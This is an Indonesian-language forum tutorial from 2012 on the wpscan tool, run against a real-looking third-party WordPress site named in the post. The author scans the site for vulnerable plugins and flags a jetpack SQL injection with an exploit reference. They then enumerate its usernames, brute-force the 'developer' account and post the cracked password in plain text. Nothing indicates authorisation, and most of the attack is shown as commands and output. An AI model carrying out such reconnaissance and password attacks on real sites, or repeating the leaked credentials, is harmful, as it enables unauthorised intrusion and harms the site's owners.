RieqyNS13 Moderator
Jumlah posting : 379 Join date : 2011-01-16 Age : 26 Lokasi : chmod 0655 GetConfig.SQL
| Subject: Enumerate wordpress site dengan wpsan.rb Sun Dec 30, 2012 11:15 pm | |
| Wpscan kanggo linux gak usah kebanyakan bacot gan :dead mungkin sebagian besar member DC udah tw,,jdi yg udah tw enyah aja dri sini,,ane cuma mw share untuk yg blum tw aja :dead 1. buka wpscan.rb ( /pentest/web/wpscan ) 2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y. [*]klo agan milih y,trus udah selesai updatenya,,biasanyw muncul error kya gini pas buka wpscan.rb - Code:
-
root@bt:/pentest/web/wpscan# ./wpscan.rb -h [ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/ #<LoadError: no such file to load -- nokogiri> solusinya udah ada di error messagenya gan -_- : - Code:
-
gem install --user-install nokogiri - Code:
-
root@bt:/pentest/web/wpscan# gem install --user-install nokogiri WARNING: You don't have /root/.gem/ruby/1.9.2/bin in your PATH, gem executables will not run. Building native extensions. This could take a while... Successfully installed nokogiri-1.5.2 1 gem installed Installing ri documentation for nokogiri-1.5.2... Installing RDoc documentation for nokogiri-1.5.2... 3. Ketik ./wpscan.rb atau ./wpscan.rb --help - Code:
-
____________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team Sponsored by the RandomStorm Open Source Initiative _____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
Help :
Some values are settable in conf/browser.conf.json : user-agent, proxy, threads, cache timeout and request timeout
--update Update to the latest revision --url | -u <target url> The WordPress URL/domain to scan. --force | -f Forces WPScan to not check if the remote site is running WordPress. --enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 u[10-20] usernames from id 10 to 20 (you must write [] chars) p plugins p! only vulnerable plugins t timthumbs Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins If no option is supplied, the default is 'tup!'
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not --wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed --wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed --proxy Supply a proxy in the format host:port (will override the one from conf/browser.conf.json) --wordlist | -w <wordlist> Supply a wordlist for the password bruter and do the brute. --threads | -t <number of threads> The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json) --username | -U <username> Only brute force the supplied username. --help | -h This help screen. --verbose | -v Verbose output.
. sampe sini agan bisa nerusin sendiri kan ? :ngamuk:nothing Klo ada yg belum tw,,ya udah ane ksih tutor sekalian. bgi yg udah tw ngapain ente kemari :ngakak 4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln : - Code:
-
./wpscan.rb --url www.productbestbuy.com --enumerate p! - Code:
-
root@bt:/pentest/web/wpscan# ./wpscan.rb --url www.productbestbuy.com --enumerate p! ____________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team Sponsored by the RandomStorm Open Source Initiative _____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com | Started on Sun Dec 30 21:54:53 2012
[!] The WordPress theme in use is easel v3.0.7 [!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists [!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php' [!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/ | | [!] jetpack plugin SQL Injection Vulnerability | * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating installed plugins (only vulnerable ones) ...
Checking for 253 total plugins... 100% complete.
[+] We found 1 plugins:
| Name: jetpack | Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/ | Directory listing enabled? Yes. | | [!] jetpack plugin SQL Injection Vulnerability | * Reference: http://www.exploit-db.com/exploits/18126/
[+] Finished at Sun Dec 30 21:56:44 2012
tu gan, nemu 1 plugin vuln,,malah udah dikasih exploit nya :tepokjidat 5. skarang coba ane cari username nya : - Code:
-
./wpscan.rb --url www.productbestbuy.com --enumerate u - Code:
-
./wpscan.rb --url www.productbestbuy.com --enumerate u ____________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team Sponsored by the RandomStorm Open Source Initiative _____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com | Started on Sun Dec 30 22:22:31 2012
[!] The WordPress theme in use is easel v3.0.7 [!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists [!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php' [!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/ | | [!] jetpack plugin SQL Injection Vulnerability | * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating usernames ...
We found the following 2 username/s :
admin developer
ada 2 user gan, admin ama developer wpscan versi bru aneh,,wong cuma nyari username aja,,pluginnya ikut discan juga :stress (buang2 waktu aja) 6. skarang nyari password nya pke brute force :kartumerah, harus sediain wordlist.lst bejibun nih berarti :prustasi. Wordist ane letaknya di /root/Desktop/wordlist.lst - Code:
-
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst - Code:
-
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst ____________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team Sponsored by the RandomStorm Open Source Initiative _____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com | Started on Sun Dec 30 22:36:41 2012
[!] The WordPress theme in use is easel v3.0.7 [!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists [!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php' [!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/ | | [!] jetpack plugin SQL Injection Vulnerability | * Reference: http://www.exploit-db.com/exploits/18126/
[+] Starting the password brute forcer
Brute forcing user 'developer' with 12 passwords... 58% complete. [SUCCESS] Username : developer Password : cisadane123456
[+] Finished at Sun Dec 30 22:38:18 2012
nemu tuh gan - Code:
-
Username : developer Password : cisadane123456 pic: - pic:
penulis : RieqyNS13 wpscan developer : ethicalhacke3r kata developernya,,wpscan.rb gak support untuk windows walapun udah di install ruby(pengalaman),,jdi coba aga pke cygwin aja :ngakak agar lebih tw,,agan2 liat README nya aja -_- - Code:
-
https://github.com/wpscanteam/wpscan/blob/master/README | |
|